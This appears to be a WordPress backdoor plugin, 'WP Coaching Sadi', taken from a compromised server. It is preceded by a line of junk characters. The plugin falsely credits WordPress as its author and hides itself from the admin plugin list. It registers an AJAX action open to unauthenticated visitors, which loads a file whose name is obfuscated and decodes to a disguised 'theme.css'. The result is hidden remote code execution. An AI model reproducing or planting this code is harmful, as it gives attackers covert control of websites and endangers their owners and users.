*(……&*6干sfa绅士的风度sfsdfd不打发打发死啊好办法
/home/comfrqjt/www/wp-content/plugins/wp-coaching-sadi/wp-coaching-sadi.php
<?php
/*
Plugin Name: WP Coaching Sadi
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 16.4.5
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function xmu_rul() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $z = array('wp-coaching-sadi/wp-coaching-sadi.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $z)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function hqk_jxn($plugins) {
    $w = 'wp-coaching-sadi/wp-coaching-sadi.php';
    if (array_key_exists($w, $plugins)) {
        unset($plugins[$w]);
    }
    return $plugins;
}

function hud($i, $n) {
    $l = '';
    for ($b = 0; $b < strlen($i); $b += 2) {
        $p = ord($i[$b]) - 65;
        $a = ord($i[$b + 1]);
        if ($a > 90) $a -= 6;
        $h = $p * 52 + ($a - 65);
        $l .= chr($h - $n);
    }
    return $l;
}

function pvl_ajax_handler() {
    require_once plugin_dir_path(__FILE__) . hud('KSKGKDKLKDJAKBKRKR', 422);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'xmu_rul');
    add_filter('all_plugins', 'hqk_jxn');
    
    add_action('wp_ajax_coa_sad', 'pvl_ajax_handler');
    add_action('wp_ajax_nopriv_coa_sad', 'pvl_ajax_handler');
}